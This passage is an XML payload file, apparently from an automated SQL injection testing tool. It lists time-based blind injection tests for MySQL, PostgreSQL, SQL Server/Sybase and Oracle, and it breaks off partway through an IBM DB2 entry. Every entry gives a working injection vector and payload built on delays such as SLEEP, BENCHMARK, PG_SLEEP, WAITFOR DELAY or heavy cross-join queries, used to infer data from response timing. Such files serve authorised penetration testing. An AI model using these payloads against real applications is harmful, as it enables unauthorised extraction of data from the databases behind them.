Path: blob/master/data/xml/payloads/time_blind.xml
2992 views
<?xml version="1.0" encoding="UTF-8"?>12<root>3<!-- Time-based boolean tests -->45<!-- Prefering "query SLEEP" over "SLEEP" because of JOIN-alike cases where SLEEPs get called multiple times (e.g. http://testphp.vulnweb.com/listproducts.php?cat=1) -->6<test>7<title>MySQL >= 5.0.12 AND time-based blind (query SLEEP)</title>8<stype>5</stype>9<level>1</level>10<risk>1</risk>11<clause>1,2,3,8,9</clause>12<where>1</where>13<vector>AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>14<request>15<payload>AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>16</request>17<response>18<time>[SLEEPTIME]</time>19</response>20<details>21<dbms>MySQL</dbms>22<dbms_version>>= 5.0.12</dbms_version>23</details>24</test>2526<test>27<title>MySQL >= 5.0.12 OR time-based blind (query SLEEP)</title>28<stype>5</stype>29<level>1</level>30<risk>3</risk>31<clause>1,2,3,9</clause>32<where>1</where>33<vector>OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>34<request>35<payload>OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>36</request>37<response>38<time>[SLEEPTIME]</time>39</response>40<details>41<dbms>MySQL</dbms>42<dbms_version>>= 5.0.12</dbms_version>43</details>44</test>4546<test>47<title>MySQL >= 5.0.12 AND time-based blind (SLEEP)</title>48<stype>5</stype>49<level>2</level>50<risk>1</risk>51<clause>1,2,3,8,9</clause>52<where>1</where>53<vector>AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>54<request>55<payload>AND SLEEP([SLEEPTIME])</payload>56</request>57<response>58<time>[SLEEPTIME]</time>59</response>60<details>61<dbms>MySQL</dbms>62<dbms_version>>= 5.0.12</dbms_version>63</details>64</test>6566<test>67<title>MySQL >= 5.0.12 OR time-based blind (SLEEP)</title>68<stype>5</stype>69<level>2</level>70<risk>3</risk>71<clause>1,2,3,9</clause>72<where>1</where>73<vector>OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>74<request>75<payload>OR SLEEP([SLEEPTIME])</payload>76</request>77<response>78<time>[SLEEPTIME]</time>79</response>80<details>81<dbms>MySQL</dbms>82<dbms_version>>= 5.0.12</dbms_version>83</details>84</test>8586<test>87<title>MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)</title>88<stype>5</stype>89<level>3</level>90<risk>1</risk>91<clause>1,2,3,9</clause>92<where>1</where>93<vector>AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>94<request>95<payload>AND SLEEP([SLEEPTIME])</payload>96<comment>#</comment>97</request>98<response>99<time>[SLEEPTIME]</time>100</response>101<details>102<dbms>MySQL</dbms>103<dbms_version>>= 5.0.12</dbms_version>104</details>105</test>106107<test>108<title>MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)</title>109<stype>5</stype>110<level>3</level>111<risk>3</risk>112<clause>1,2,3,9</clause>113<where>1</where>114<vector>OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>115<request>116<payload>OR SLEEP([SLEEPTIME])</payload>117<comment>#</comment>118</request>119<response>120<time>[SLEEPTIME]</time>121</response>122<details>123<dbms>MySQL</dbms>124<dbms_version>>= 5.0.12</dbms_version>125</details>126</test>127128<test>129<title>MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)</title>130<stype>5</stype>131<level>3</level>132<risk>1</risk>133<clause>1,2,3,9</clause>134<where>1</where>135<vector>AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>136<request>137<payload>AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>138<comment>#</comment>139</request>140<response>141<time>[SLEEPTIME]</time>142</response>143<details>144<dbms>MySQL</dbms>145<dbms_version>>= 5.0.12</dbms_version>146</details>147</test>148149<test>150<title>MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)</title>151<stype>5</stype>152<level>3</level>153<risk>3</risk>154<clause>1,2,3,9</clause>155<where>1</where>156<vector>OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>157<request>158<payload>OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>159<comment>#</comment>160</request>161<response>162<time>[SLEEPTIME]</time>163</response>164<details>165<dbms>MySQL</dbms>166<dbms_version>>= 5.0.12</dbms_version>167</details>168</test>169170<test>171<title>MySQL < 5.0.12 AND time-based blind (BENCHMARK)</title>172<stype>5</stype>173<level>2</level>174<risk>2</risk>175<clause>1,2,3,8,9</clause>176<where>1</where>177<vector>AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>178<request>179<payload>AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>180</request>181<response>182<time>[DELAYED]</time>183</response>184<details>185<dbms>MySQL</dbms>186<dbms_version>< 5.0.12</dbms_version>187</details>188</test>189190<test>191<title>MySQL > 5.0.12 AND time-based blind (heavy query)</title>192<stype>5</stype>193<level>3</level>194<risk>2</risk>195<clause>1,2,3,8,9</clause>196<where>1</where>197<vector>AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])</vector>198<request>199<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)</payload>200</request>201<response>202<time>[DELAYED]</time>203</response>204<details>205<dbms>MySQL</dbms>206<dbms_version>> 5.0.12</dbms_version>207</details>208</test>209210<test>211<title>MySQL < 5.0.12 OR time-based blind (BENCHMARK)</title>212<stype>5</stype>213<level>2</level>214<risk>3</risk>215<clause>1,2,3,9</clause>216<where>1</where>217<vector>OR [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>218<request>219<payload>OR [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>220</request>221<response>222<time>[DELAYED]</time>223</response>224<details>225<dbms>MySQL</dbms>226<dbms_version>< 5.0.12</dbms_version>227</details>228</test>229230<test>231<title>MySQL > 5.0.12 OR time-based blind (heavy query)</title>232<stype>5</stype>233<level>3</level>234<risk>3</risk>235<clause>1,2,3,9</clause>236<where>1</where>237<vector>OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])</vector>238<request>239<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)</payload>240</request>241<response>242<time>[DELAYED]</time>243</response>244<details>245<dbms>MySQL</dbms>246<dbms_version>> 5.0.12</dbms_version>247</details>248</test>249250<test>251<title>MySQL < 5.0.12 AND time-based blind (BENCHMARK - comment)</title>252<stype>5</stype>253<level>5</level>254<risk>2</risk>255<clause>1,2,3,9</clause>256<where>1</where>257<vector>AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>258<request>259<payload>AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>260<comment>#</comment>261</request>262<response>263<time>[DELAYED]</time>264</response>265<details>266<dbms>MySQL</dbms>267<dbms_version>< 5.0.12</dbms_version>268</details>269</test>270271<test>272<title>MySQL > 5.0.12 AND time-based blind (heavy query - comment)</title>273<stype>5</stype>274<level>5</level>275<risk>2</risk>276<clause>1,2,3,9</clause>277<where>1</where>278<vector>AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])</vector>279<request>280<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)</payload>281<comment>#</comment>282</request>283<response>284<time>[DELAYED]</time>285</response>286<details>287<dbms>MySQL</dbms>288<dbms_version>> 5.0.12</dbms_version>289</details>290</test>291292<test>293<title>MySQL < 5.0.12 OR time-based blind (BENCHMARK - comment)</title>294<stype>5</stype>295<level>5</level>296<risk>3</risk>297<clause>1,2,3,9</clause>298<where>1</where>299<vector>OR [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>300<request>301<payload>OR [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>302<comment>#</comment>303</request>304<response>305<time>[DELAYED]</time>306</response>307<details>308<dbms>MySQL</dbms>309<dbms_version>< 5.0.12</dbms_version>310</details>311</test>312313<test>314<title>MySQL > 5.0.12 OR time-based blind (heavy query - comment)</title>315<stype>5</stype>316<level>5</level>317<risk>3</risk>318<clause>1,2,3,9</clause>319<where>1</where>320<vector>OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])</vector>321<request>322<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)</payload>323<comment>#</comment>324</request>325<response>326<time>[DELAYED]</time>327</response>328<details>329<dbms>MySQL</dbms>330<dbms_version>> 5.0.12</dbms_version>331</details>332</test>333334<test>335<title>MySQL >= 5.0.12 RLIKE time-based blind</title>336<stype>5</stype>337<level>2</level>338<risk>1</risk>339<clause>1,2,3,9</clause>340<where>1</where>341<vector>RLIKE (SELECT [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]))</vector>342<request>343<payload>RLIKE SLEEP([SLEEPTIME])</payload>344</request>345<response>346<time>[SLEEPTIME]</time>347</response>348<details>349<dbms>MySQL</dbms>350<dbms_version>>= 5.0.12</dbms_version>351</details>352</test>353354<test>355<title>MySQL >= 5.0.12 RLIKE time-based blind (comment)</title>356<stype>5</stype>357<level>4</level>358<risk>1</risk>359<clause>1,2,3,9</clause>360<where>1</where>361<vector>RLIKE (SELECT [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]))</vector>362<request>363<payload>RLIKE SLEEP([SLEEPTIME])</payload>364<comment>#</comment>365</request>366<response>367<time>[SLEEPTIME]</time>368</response>369<details>370<dbms>MySQL</dbms>371<dbms_version>>= 5.0.12</dbms_version>372</details>373</test>374375<test>376<title>MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)</title>377<stype>5</stype>378<level>3</level>379<risk>1</risk>380<clause>1,2,3,9</clause>381<where>1</where>382<vector>RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>383<request>384<payload>RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>385</request>386<response>387<time>[SLEEPTIME]</time>388</response>389<details>390<dbms>MySQL</dbms>391<dbms_version>>= 5.0.12</dbms_version>392</details>393</test>394395<test>396<title>MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)</title>397<stype>5</stype>398<level>4</level>399<risk>1</risk>400<clause>1,2,3,9</clause>401<where>1</where>402<vector>RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>403<request>404<payload>RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>405<comment>#</comment>406</request>407<response>408<time>[SLEEPTIME]</time>409</response>410<details>411<dbms>MySQL</dbms>412<dbms_version>>= 5.0.12</dbms_version>413</details>414</test>415416<test>417<title>MySQL AND time-based blind (ELT)</title>418<stype>5</stype>419<level>3</level>420<risk>1</risk>421<clause>1,2,3,8,9</clause>422<where>1</where>423<vector>AND ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>424<request>425<payload>AND ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>426</request>427<response>428<time>[SLEEPTIME]</time>429</response>430<details>431<dbms>MySQL</dbms>432<dbms_version>>= 5.0.12</dbms_version>433</details>434</test>435436<test>437<title>MySQL OR time-based blind (ELT)</title>438<stype>5</stype>439<level>3</level>440<risk>3</risk>441<clause>1,2,3,9</clause>442<where>1</where>443<vector>OR ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>444<request>445<payload>OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>446</request>447<response>448<time>[SLEEPTIME]</time>449</response>450<details>451<dbms>MySQL</dbms>452</details>453</test>454455<test>456<title>MySQL AND time-based blind (ELT - comment)</title>457<stype>5</stype>458<level>5</level>459<risk>1</risk>460<clause>1,2,3,9</clause>461<where>1</where>462<vector>AND ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>463<request>464<payload>AND ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>465<comment>#</comment>466</request>467<response>468<time>[SLEEPTIME]</time>469</response>470<details>471<dbms>MySQL</dbms>472</details>473</test>474475<test>476<title>MySQL OR time-based blind (ELT - comment)</title>477<stype>5</stype>478<level>5</level>479<risk>3</risk>480<clause>1,2,3,9</clause>481<where>1</where>482<vector>OR ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>483<request>484<payload>OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>485<comment>#</comment>486</request>487<response>488<time>[SLEEPTIME]</time>489</response>490<details>491<dbms>MySQL</dbms>492</details>493</test>494495<test>496<title>PostgreSQL > 8.1 AND time-based blind</title>497<stype>5</stype>498<level>1</level>499<risk>1</risk>500<clause>1,2,3,8,9</clause>501<where>1</where>502<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>503<request>504<payload>AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))</payload>505</request>506<response>507<time>[SLEEPTIME]</time>508</response>509<details>510<dbms>PostgreSQL</dbms>511<dbms_version>> 8.1</dbms_version>512</details>513</test>514515<test>516<title>PostgreSQL > 8.1 OR time-based blind</title>517<stype>5</stype>518<level>1</level>519<risk>3</risk>520<clause>1,2,3,9</clause>521<where>1</where>522<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>523<request>524<payload>OR [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))</payload>525</request>526<response>527<time>[SLEEPTIME]</time>528</response>529<details>530<dbms>PostgreSQL</dbms>531<dbms_version>> 8.1</dbms_version>532</details>533</test>534535<test>536<title>PostgreSQL > 8.1 AND time-based blind (comment)</title>537<stype>5</stype>538<level>4</level>539<risk>1</risk>540<clause>1,2,3,9</clause>541<where>1</where>542<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>543<request>544<payload>AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))</payload>545<comment>--</comment>546</request>547<response>548<time>[SLEEPTIME]</time>549</response>550<details>551<dbms>PostgreSQL</dbms>552<dbms_version>> 8.1</dbms_version>553</details>554</test>555556<test>557<title>PostgreSQL > 8.1 OR time-based blind (comment)</title>558<stype>5</stype>559<level>4</level>560<risk>3</risk>561<clause>1,2,3,9</clause>562<where>1</where>563<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>564<request>565<payload>OR [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))</payload>566<comment>--</comment>567</request>568<response>569<time>[SLEEPTIME]</time>570</response>571<details>572<dbms>PostgreSQL</dbms>573<dbms_version>> 8.1</dbms_version>574</details>575</test>576577<test>578<title>PostgreSQL AND time-based blind (heavy query)</title>579<stype>5</stype>580<level>2</level>581<risk>2</risk>582<clause>1,2,3,8,9</clause>583<where>1</where>584<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>585<request>586<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))</payload>587</request>588<response>589<time>[DELAYED]</time>590</response>591<details>592<dbms>PostgreSQL</dbms>593</details>594</test>595596<test>597<title>PostgreSQL OR time-based blind (heavy query)</title>598<stype>5</stype>599<level>2</level>600<risk>3</risk>601<clause>1,2,3,9</clause>602<where>1</where>603<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>604<request>605<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))</payload>606</request>607<response>608<time>[DELAYED]</time>609</response>610<details>611<dbms>PostgreSQL</dbms>612</details>613</test>614615<test>616<title>PostgreSQL AND time-based blind (heavy query - comment)</title>617<stype>5</stype>618<level>5</level>619<risk>2</risk>620<clause>1,2,3,9</clause>621<where>1</where>622<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>623<request>624<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))</payload>625<comment>--</comment>626</request>627<response>628<time>[DELAYED]</time>629</response>630<details>631<dbms>PostgreSQL</dbms>632</details>633</test>634635<test>636<title>PostgreSQL OR time-based blind (heavy query - comment)</title>637<stype>5</stype>638<level>5</level>639<risk>3</risk>640<clause>1,2,3,9</clause>641<where>1</where>642<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>643<request>644<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))</payload>645<comment>--</comment>646</request>647<response>648<time>[DELAYED]</time>649</response>650<details>651<dbms>PostgreSQL</dbms>652</details>653</test>654655<test>656<title>Microsoft SQL Server/Sybase time-based blind (IF)</title>657<stype>5</stype>658<level>1</level>659<risk>1</risk>660<clause>0</clause>661<where>1</where>662<vector>IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>663<request>664<payload>WAITFOR DELAY '0:0:[SLEEPTIME]'</payload>665</request>666<response>667<time>[SLEEPTIME]</time>668</response>669<details>670<dbms>Microsoft SQL Server</dbms>671<dbms>Sybase</dbms>672</details>673</test>674675<test>676<title>Microsoft SQL Server/Sybase time-based blind (IF - comment)</title>677<stype>5</stype>678<level>4</level>679<risk>1</risk>680<clause>0</clause>681<where>1</where>682<vector>IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>683<request>684<payload>WAITFOR DELAY '0:0:[SLEEPTIME]'</payload>685<comment>--</comment>686</request>687<response>688<time>[SLEEPTIME]</time>689</response>690<details>691<dbms>Microsoft SQL Server</dbms>692<dbms>Sybase</dbms>693</details>694</test>695696<test>697<title>Microsoft SQL Server/Sybase AND time-based blind (heavy query)</title>698<stype>5</stype>699<level>2</level>700<risk>2</risk>701<clause>1,2,3,8,9</clause>702<where>1</where>703<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>704<request>705<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)</payload>706</request>707<response>708<time>[DELAYED]</time>709</response>710<details>711<dbms>Microsoft SQL Server</dbms>712<dbms>Sybase</dbms>713</details>714</test>715716<test>717<title>Microsoft SQL Server/Sybase OR time-based blind (heavy query)</title>718<stype>5</stype>719<level>2</level>720<risk>3</risk>721<clause>1,2,3,9</clause>722<where>1</where>723<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>724<request>725<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)</payload>726</request>727<response>728<time>[DELAYED]</time>729</response>730<details>731<dbms>Microsoft SQL Server</dbms>732<dbms>Sybase</dbms>733</details>734</test>735736<test>737<title>Microsoft SQL Server/Sybase AND time-based blind (heavy query - comment)</title>738<stype>5</stype>739<level>5</level>740<risk>2</risk>741<clause>1,2,3,9</clause>742<where>1</where>743<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>744<request>745<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)</payload>746<comment>--</comment>747</request>748<response>749<time>[DELAYED]</time>750</response>751<details>752<dbms>Microsoft SQL Server</dbms>753<dbms>Sybase</dbms>754</details>755</test>756757<test>758<title>Microsoft SQL Server/Sybase OR time-based blind (heavy query - comment)</title>759<stype>5</stype>760<level>5</level>761<risk>3</risk>762<clause>1,2,3,9</clause>763<where>1</where>764<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>765<request>766<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)</payload>767<comment>--</comment>768</request>769<response>770<time>[DELAYED]</time>771</response>772<details>773<dbms>Microsoft SQL Server</dbms>774<dbms>Sybase</dbms>775</details>776</test>777778<test>779<title>Oracle AND time-based blind</title>780<stype>5</stype>781<level>1</level>782<risk>1</risk>783<clause>1,2,3,9</clause>784<where>1</where>785<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>786<request>787<payload>AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>788</request>789<response>790<time>[SLEEPTIME]</time>791</response>792<details>793<dbms>Oracle</dbms>794</details>795</test>796797<test>798<title>Oracle OR time-based blind</title>799<stype>5</stype>800<level>1</level>801<risk>3</risk>802<clause>1,2,3,9</clause>803<where>1</where>804<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>805<request>806<payload>OR [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>807</request>808<response>809<time>[SLEEPTIME]</time>810</response>811<details>812<dbms>Oracle</dbms>813</details>814</test>815816<test>817<title>Oracle AND time-based blind (comment)</title>818<stype>5</stype>819<level>4</level>820<risk>1</risk>821<clause>1,2,3,9</clause>822<where>1</where>823<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>824<request>825<payload>AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>826<comment>--</comment>827</request>828<response>829<time>[SLEEPTIME]</time>830</response>831<details>832<dbms>Oracle</dbms>833</details>834</test>835836<test>837<title>Oracle OR time-based blind (comment)</title>838<stype>5</stype>839<level>4</level>840<risk>3</risk>841<clause>1,2,3,9</clause>842<where>1</where>843<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>844<request>845<payload>OR [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>846<comment>--</comment>847</request>848<response>849<time>[SLEEPTIME]</time>850</response>851<details>852<dbms>Oracle</dbms>853</details>854</test>855856<test>857<title>Oracle AND time-based blind (heavy query)</title>858<stype>5</stype>859<level>2</level>860<risk>2</risk>861<clause>1,2,3,9</clause>862<where>1</where>863<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>864<request>865<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>866</request>867<response>868<time>[DELAYED]</time>869</response>870<details>871<dbms>Oracle</dbms>872</details>873</test>874875<test>876<title>Oracle OR time-based blind (heavy query)</title>877<stype>5</stype>878<level>2</level>879<risk>3</risk>880<clause>1,2,3,9</clause>881<where>1</where>882<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>883<request>884<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>885</request>886<response>887<time>[DELAYED]</time>888</response>889<details>890<dbms>Oracle</dbms>891</details>892</test>893894<test>895<title>Oracle AND time-based blind (heavy query - comment)</title>896<stype>5</stype>897<level>5</level>898<risk>2</risk>899<clause>1,2,3,9</clause>900<where>1</where>901<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>902<request>903<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>904<comment>--</comment>905</request>906<response>907<time>[DELAYED]</time>908</response>909<details>910<dbms>Oracle</dbms>911</details>912</test>913914<test>915<title>Oracle OR time-based blind (heavy query - comment)</title>916<stype>5</stype>917<level>5</level>918<risk>3</risk>919<clause>1,2,3,9</clause>920<where>1</where>921<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>922<request>923<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>924<comment>--</comment>925</request>926<response>927<time>[DELAYED]</time>928</response>929<details>930<dbms>Oracle</dbms>931</details>932</test>933934<test>935<title>IBM DB2 AND time-based blind (heavy query)</title>936<stype>5</stype>937<level>3</level>938<risk>2</risk>939<clause>1,2,3,9</clause>940<where>1</where>941<vector>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS 